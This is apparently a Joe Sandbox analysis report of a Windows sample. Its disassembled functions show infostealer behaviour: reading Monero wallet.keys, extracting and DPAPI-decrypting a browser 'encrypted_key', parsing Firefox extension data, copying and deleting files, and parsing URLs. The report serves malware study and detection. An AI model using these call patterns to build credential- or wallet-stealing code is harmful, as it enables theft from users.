Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-4027016359
Opcode ID: 3bdd10075072ed24283e0f4bbf2e2c6b73aa619bc15082df259ac97fd940d0bf
Instruction ID: 69da9c55a51e0af52cd44df90d965b4f731c38a6c6e5a33d32f2b383683e3a01
Opcode Fuzzy Hash: 3bdd10075072ed24283e0f4bbf2e2c6b73aa619bc15082df259ac97fd940d0bf
Instruction Fuzzy Hash: 404133B5912104DFDB08EFE8EC85AAA77B4F725301F18412AF507D36A0DB349A46CB63

Function 0089A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008A8B60: GetSystemTime.KERNEL32(008B0E1A,0156A038,008B05AE,?,?,008913F9,?,0000001A,008B0E1A,00000000,?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008A8B86

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0089A2E1
lstrlen.KERNEL32(00000000,00000000), ref: 0089A3FF
lstrlen.KERNEL32(00000000), ref: 0089A6BC

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

DeleteFileA.KERNEL32(00000000), ref: 0089A743

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 015107208b5facf00f762a8537cba0e7038db8554e12f08922043a71dd7579fb
Instruction ID: 8a273d6ad57259c1cc5ffd9b9697dfc0da7df53b39f3c9922dbec818c90fd5b1
Opcode Fuzzy Hash: 015107208b5facf00f762a8537cba0e7038db8554e12f08922043a71dd7579fb
Instruction Fuzzy Hash: 30E1D2728101189AEB48EBA8DC95EEE7338FF15300F548169F517F6891EF346A49CB63

Function 0089D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008A8B60: GetSystemTime.KERNEL32(008B0E1A,0156A038,008B05AE,?,?,008913F9,?,0000001A,008B0E1A,00000000,?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008A8B86

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0089D801
lstrlen.KERNEL32(00000000), ref: 0089D99F
lstrlen.KERNEL32(00000000), ref: 0089D9B3
DeleteFileA.KERNEL32(00000000), ref: 0089DA32

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: d43d4afbd3b2f1fe874c8b897646dd94007cff2b921ad0f9174a680230de5f78
Instruction ID: 7d44bc6462baa41e0157a5616e400f436f84cdc960491317bd3f47b65044638a
Opcode Fuzzy Hash: d43d4afbd3b2f1fe874c8b897646dd94007cff2b921ad0f9174a680230de5f78
Instruction Fuzzy Hash: 3681FE719101149AEB48FBA8DC96EEE7338FF15300F444129F417E6991EF386A09CB63

Function 0089F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 008999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008999EC
Part of subcall function 008999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00899A11
Part of subcall function 008999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00899A31
Part of subcall function 008999C0: ReadFile.KERNEL32(000000FF,?,00000000,0089148F,00000000), ref: 00899A5A
Part of subcall function 008999C0: LocalFree.KERNEL32(0089148F), ref: 00899A90
Part of subcall function 008999C0: CloseHandle.KERNEL32(000000FF), ref: 00899A9A

Part of subcall function 008A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008A8E52

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,008B1580,008B0D92), ref: 0089F54C
lstrlen.KERNEL32(00000000), ref: 0089F56B

Strings

moz-extension+++, xrefs: 0089F5AD
^userContextId=4294967295, xrefs: 0089F59C

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: dc27780b570c9db85aef0068090c07d192bf6e9c406b48b95925abe95f0b1603
Instruction ID: 6c69dd1b583d19e782f3b18ef1408d3b97df4d76ad9ba2ac5643c693d5b81778
Opcode Fuzzy Hash: dc27780b570c9db85aef0068090c07d192bf6e9c406b48b95925abe95f0b1603
Instruction Fuzzy Hash: 0051F1719101089AEB48FBA8DC96DEE7778FF55300F448528F417D6991EF386609CBA3

Function 00899CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008999EC
Part of subcall function 008999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00899A11
Part of subcall function 008999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00899A31
Part of subcall function 008999C0: ReadFile.KERNEL32(000000FF,?,00000000,0089148F,00000000), ref: 00899A5A
Part of subcall function 008999C0: LocalFree.KERNEL32(0089148F), ref: 00899A90
Part of subcall function 008999C0: CloseHandle.KERNEL32(000000FF), ref: 00899A9A

Part of subcall function 008A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008A8E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00899D39

Part of subcall function 00899AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00894EEE,00000000,00000000), ref: 00899AEF
Part of subcall function 00899AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00894EEE,00000000,?), ref: 00899B01
Part of subcall function 00899AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00894EEE,00000000,00000000), ref: 00899B2A
Part of subcall function 00899AC0: LocalFree.KERNEL32(?,?,?,?,00894EEE,00000000,?), ref: 00899B3F

Part of subcall function 00899B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00899B84
Part of subcall function 00899B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00899BA3
Part of subcall function 00899B60: LocalFree.KERNEL32(?), ref: 00899BD3

Strings

DPAPI, xrefs: 00899D89
"encrypted_key":", xrefs: 00899D30
, xrefs: 00899DC1

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: f92d03b4e8ee7e438fd620c6cf8085acc8cc67f8bb993ba0137cbe97105e564f
Instruction ID: 938c1dd701897ad8917ef1579829b5cb147423a0e1d81b47ce2195d4751d4f96
Opcode Fuzzy Hash: f92d03b4e8ee7e438fd620c6cf8085acc8cc67f8bb993ba0137cbe97105e564f
Instruction Fuzzy Hash: 613130B5D10109ABDF04EBECDC85AEFB7B8FB49304F184519E905E7241EB349A04CBA1

Function 008A6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015689C0,?,008B110C,?,00000000,?,008B1110,?,00000000,008B0AEF), ref: 008A6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 008A6AE8
CloseHandle.KERNEL32(00000000), ref: 008A6AF9
Sleep.KERNEL32(00001770), ref: 008A6B04
CloseHandle.KERNEL32(?,00000000,?,015689C0,?,008B110C,?,00000000,?,008B1110,?,00000000,008B0AEF), ref: 008A6B1A
ExitProcess.KERNEL32 ref: 008A6B22

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: c692ec6240cc0ff7101865fab68011461855501ca6ddff207af16a3ba357d4b4
Instruction ID: 7018df1aa33ca82a20cb599ef4812cd208e503bfeb1646799937dd96f2c75988
Opcode Fuzzy Hash: c692ec6240cc0ff7101865fab68011461855501ca6ddff207af16a3ba357d4b4
Instruction Fuzzy Hash: 8AF05E30A40219ABF700EBE0DC06BBE7B74FB16701F184515F513E19C5EBB06542D667

Function 008947B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00894839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00894849

Strings

<, xrefs: 008947C9

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
